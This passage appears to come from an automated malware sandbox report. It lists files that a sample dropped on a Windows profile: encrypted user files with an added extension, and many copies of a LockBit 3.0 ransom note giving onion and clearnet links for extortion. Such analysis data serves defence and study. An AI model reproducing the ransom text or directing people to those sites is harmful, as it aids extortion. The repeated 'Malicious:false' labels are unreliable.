                SHA-512:8B47C2EC41F95314C8D515F960F7987092BC4BCB3B160D1FDD2D764E3EA33FAF3DE5553291925EF19AC7160C08BDAE80F93942FC626139539888C16BCFFF61B6
                Malicious:false
                Preview:.h.=*c"........Q....h... /E..t....:.TA.x..f~...@l..\..Z..3..@..>9.g.-..F...'.X.....\@.a.z...AC.........iUBX.j%.,..`.0U..e.b.E....x..4.s..M"....^.....7W..<z..{@.....i.m<..!....>y.......w.../:......g.>........x.B!.n[.)...h..ott...U.s)H..*.+.a..(25}. .Jt...:..l...h.1..s=)q.....p.Jd*...IT.."..;r.n..)8.[...vP....<..t.. ..%..[...b..E.z.#...;,W.[.#a%a.!U..p.&~&.).R...[.IIT...nn.\.<.C../.A.)T.Zlw...0t..4V....]}a4q.p....k...k.B./*..ll....0y7.l...a.ek..o..K|.q....^.>.Z.!?..8........4fN&|Lr.v.1...[...]'.9g...........y)...bM.......+..Qz..,.gY....bq...)...lV.O~...^.p..}.!Y..Uh.I..........k..Rk"..\....!9.h...zw...De..2...-.4.H...F..M.....kp.&...9.....G...'.!....M....5....0.XOmc..O.8.!+a.....YRC s.Zrx ...{...@...xf..YyP....5....q. .l.%....e.8.m.._.;...."7...i.x..... ......dD...$1..:..MR.......|..@k.E.`N....g..].Q..._[......u..........U.:..7T.....<:...Z*.A....k??p...C.t.NqP6........:<h^.P=....z.F.Lf.k....~`ZZh..w.I.{<........HN.....V..Gm63^...[.K.m..r

                C:\Users\user\AppData\Local\Comms\UnistoreDB\store.vol.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6291692
                Entropy (8bit):2.1792439944738695
                Encrypted:false
                SSDEEP:24576:zHR8f+UjQPagjS7xgGqGO2TimLat+5tqn8:1O+UjQ+FbimLBDq8
                MD5:9275F7CC89E2825F6B23BD4608D94F99
                SHA1:A5E0F3D3FD0CF22310CABEF5A4EC51846D160FBB
                SHA-256:4F4A25F30A541A5C01E72A7CD1A2E8F8EE30771B005CF08B9A0B34CBE6BF7D2B
                SHA-512:C48CF92193F0BC97C4A3E35D6F4CD9677C496F47BF9B223C97C72F9031CEA476E459F7910F7799B14FD9AA15BC393B0D8F1EE7167C7099545DF49632DC0BF35D
                Malicious:false
                Preview:...l.........q..V.m&.(.../..[d....'...I..p;..C..j}/.q'cx$6.s....U...{Bq.....tv..}...hd2NYzl....Q...$j^.Yu.N.6_..a.h@/mt%.qu..W....S....&/PL.p...`........,D.#.....F.D.8.w..Q.v;:}f*.T.`...o.e....T.....oy-56...Z.....<...@...j!.?..aeA.......S..;.$...;.......v;..S*..w.h..-\(.,.1..D..|.YW8..O.!..i..?FY.Z.U.@..d...T.4v......?z.[!.1...3.qM\......@]...Q..b:. ........nv<'....@D1B..!..:WF...|;.Q_.!\A.5.=wa...r.AYV.4.U..l]:..x...rA..s..z.J;..k.>.z..".L`S.9...e.....E..K0.w.f........t....B..jt.M_.1..2.Z.....[..g..eBO.S.......p..:...K..T..$E....VAH....>.....P...-.=.5{..e.-.....B.1....zG.+..$A[.6\+J....S....uU{L.. .*.....0..e.u...(V]....=%.v...5.(...2.d..e.......%aO...iwk.5:?..R.`.f....@m.....m..J....C>...s...C...]....+.$.^Ic...!...^J]Cf{..@.,x.p.D....0.>.R.J.i\<;ox..@.....j.....%..X.Fm`..-...Xt).RZ.1..L-.....N....I...u......[....cV..T..R~$.OX^7{j..]....a..j3..Yr..:p......t....!2.r=)Zv.b(.7^...-./....h.G......o..1E[.^..w.zWv..Q.K..c4q..-E........q...9V..

                C:\Users\user\AppData\Local\Comms\Unistore\data\AggregateCache.uca.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):248
                Entropy (8bit):7.157067921237472
                Encrypted:false
                SSDEEP:6:uMMP/THtoTj3CDr0mW2VJzBAWnktNsZVgDCFtlF1BVr/Ukn:oP/TKvScD2VJNAWnM+i+9BVzd
                MD5:9B76F46304C9080DD030928C63EC95BF
                SHA1:B6D5BBA981F0A9A35005972DAD8FC1A1DC2457B5
                SHA-256:C05421A31FD0F4113FB72FAC042CE7700ECE77652BC29EC2D03252D1B2B62B4A
                SHA-512:E02964B80BB1DBD1AC8C288BA6898AA2788E811628A6229CEFC8A2CB9AA8B00A455BDDDED21A07570290ECAC0E4E043F6D9B43D195614A47E3380762CDAF8F82
                Malicious:false
                Preview:.6...^8....T/........g%p..f..i..G...<..3....@.h........l.w...~....zL.(..J.&g....#.J..5D...L<.B..Vgc......L%.j.n..z.h.m3.{.f......H..G.x....+.wr.3....X............H.-.V..P.....}.X.....?..=....k....j.&..au.j,Qo...$.(..@.....h...L..8...~&

                C:\Users\user\AppData\Local\Comms\Unistore\data\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Comms\Unistore\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Comms\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\CDPGlobalSettings.cdp.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):2247
                Entropy (8bit):7.915947334423747
                Encrypted:false
                SSDEEP:48:3XfbFjs7XfSnm3bOW25SoVEtGZf2eFXP8GU+9y7DaGHezR:3XzqKmL85VqtwfvXP8GU/2GHezR
                MD5:BDA8431D7274C829A3D3AD61876364FB
                SHA1:F4C3DA0FBEB8A9FA1BE2BA83F2DA96F2219D696F
                SHA-256:3C5C3660169F1A53DB88019048E4214894A3513F3EBDC88D32A259D2A6DF74C1
                SHA-512:FF654A6FD1690456F2056834F842B41922665FF651E76F454290F87BAC7534874015E28BA316045C1E7D1FD0DE69EE68C765DA7E176C8FA120F59176D106804F
                Malicious:false
                Preview:r....x]....R..6..:t.rXaM..6P.....-.3....P.7.zax,};.*..2.....4v.W....0..a..M.L.*....*....H......u...6s..$".?....aN.)e.M%...j.b.+0.\.F..M!4.0.C...ai...._.-....m.........s..ZLB..[k...r.*.".....A....L....gU`.k....d.9._...p.?Oq.]......o..,..w$g.nk(..0d).3W..Fd.D.0$..D..V/....?.O.!..v.J.C......j.g............#...X;.g.s..b:.a$.mR...W/....em.9}.X..C.XV.....C."...I".. BY.M..."..F.~|gA.....d./.2..]&~......._.q....4.p.4 O....n.R.fhGB...A.........k.>...q>K...LCF@_.d......e..I&....-.pDY_..d.....r..F~..1.f...L.qjJEYe.....W.6..*.*...8.......5.....'....z..Fcp..S..-.k.+......./.]B.N.B...#.}.._.x...LM.L......a#..N.,.......J..6A..Y.....M!....G..m..R..._..._L?U.....)..S....=.c.e...EY.5.#J`t.\.%....=|r...,..._@.d.g7.<.... ?7<.=8.....[4.y..41$.E.}s..]...bc.o...Q-g'&..2K9.0n....o......fY..9......0Y.H.O.0..t.V.-.7...<...S.r|..w.F..].....R.H.;&.ig\..>n.......e...<'c.s..V..."..+}TE.}..Af..[..&M..G.o.b..)../s..>.!..*e.;...3e.............%..R.'-4.2..Y.N......

                C:\Users\user\AppData\Local\ConnectedDevicesPlatform\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\F4EB2D6C-ED2B-4BDD-AD9D-F913287E6768.val.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.6736274754385043
                Encrypted:false
                SSDEEP:96:3BFII6zJrVIeFpM+DqZlc0MIQ1m49CC2GHez:xF+EeFpM+Dukm4b
                MD5:C979C5FEF348232947DBC4E9326CC56A
                SHA1:8D55AA9D7F0C0BCE6F09D7E7EF7367CFDF082FE2
                SHA-256:37B45C246ADB12B7BD8F2CDC19747D9E358563C6D065049BB814312BB95ADF64
                SHA-512:3CFBAD305ACF94D2AE8489E19D289E30B44BAC96772F866240B517DAF4E17B2151CFC8B8E5C260DB97FAA30F90D2C8ABB6E79F489913B063CA30E40E040049FF
                Malicious:false
                Preview:...Q...p.d.H81..jW..oa....TL.Hq.Dx_n.b.F..j...........&..uO..a..6........GU..g.[g...N^...D...............>^...#..\.?...4.[f.".Hs......m.1.PH.i:"..2...-...#.......$..z..x<....P...Q.8;=#:.s|X6..b......O.3.(-....kS.3...fp]Jav~.....J...v9.y..2..:...x..Q=.y..>|.}S-.D.u...O.....3...MpW......[......k.E.h.......H)......&.&.N.-...&.{4S. ..r*(.:P..^..h<..`0....G./.M..<.V..X.h...D...{%s..H}..."9.e..Y.S.-&...%......<.Nr......`RA.y......$.<...r?z.;....,.4.,.t.....oxO.a.?..[.w...d....Tq........l.Na.....M.p.j.E...If..k.a..[..M.M.Y...........I...A{..X...)....H.1&.C.i.....6je.......v.c.;.F.S0.......O@...=..."3]...[..q......hx.......f......Gz.]..d.............z...CtA.-.0.....Gx...>..YB...6..*..V:..V.<!....".1.=.B...5..=.X....O......we...hL...@..F,4p...e..........f@...*".(...E...".^......MM&.H^.eC=s.I.S.CT.0.g.%.......Kf.W...W0.$`..E...`.Q.i.....R~...o.o......FD....HR.^6.2.&!.z.c..@.V.f.G..K1.{_Du...A8...S.q.mW..X.a.oi^W,Y.r*......../J.r ...5......

                C:\Users\user\AppData\Local\D3DSCache\e8010882af4f153f\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\D3DSCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\DBG\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\BrowserMetrics-62FC0DB0-1450.pma.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):4194577
                Entropy (8bit):1.5383034181904158
                Encrypted:false
                SSDEEP:12288:Y+GQ0GicaTOBLmoyaJDmHWnTMt+HDrIIJ2Hn+rf9/pOTdu:Y+GQrFaTwyqZTMtGrIfHn+rf5pOTY
                MD5:409B840E7EEA695A5A1B52125173D723
                SHA1:D7C6B440A72B3451E1F0C8FAB77D00AB8CCC924D
                SHA-256:E20BE78B2534222E9922F4D8EAB60A37E119C7D7C0698BAABF190C284B89DA83
                SHA-512:4433284A97AE3BC22D39C7CEEB72C1EF07FFFAE08B88A265FF8A4CD9F8422C72C4D0DD76ABE2F9814F2EA62DCC21B4B7ABC8A80EC71493511A10620821539652
                Malicious:false
                Preview:XZ.*...v....K..N.~AH.[....F>u..v.1..g......~..`...u.Z......wE.q.j..F..."F.=2@.o{...)z)\7...T..W&.....yv.u\d.y.6..Ql....kL.?.7.Q..$...\}.^.V...p..j.q..8....n.~L.b...o......-.|q.X..l...Q...TM.;....x..Tt=....Up.l"h...p$.BvK(...x....!..5..PH0T.........OF...piF.Z.Xo.D.C..T...wkN..t...N..e...vQ4.eh..d...E..y.N.n...?...........$.<^]).!.E..0.`...o..E...7.....M.@..F.../.. .q<..}'......:S.....`P...e4...z.m;..Q...p..w.."U..).~=b.\....b.....A..k..T.$.U.#-...z......HGq..kw.]..6. .....+..*...b.N.\'....W.}...K.FM.v.O...sl.J.4..R?.w....3..=H.h...U.....,.^..N.<&t.<.K{.A-(.n.wK..F..[.>b.C...c.6..y..uu2ET.%._...Q..U.....|..>T.b...,.J..."lp.m.+.5...&..DsJ.{(W.[.......C....D.d....Q...........p.w.....`..F......K.z.o;e.Pd..`=...m.hk.'.km...}s..aZ.U..D...K....4r......{M..kC.....x..w....Uq#8.C..!..29I....%..@.....W..n[.._C..#..1T...yD.k....o.&\...} ..\..N..-y(.s-..11l.......jy.1`.U7.ZG...e........9..).Ws....:.~.{wP..#.r.......P......o.l.=......eWD....#.(._!

                C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor 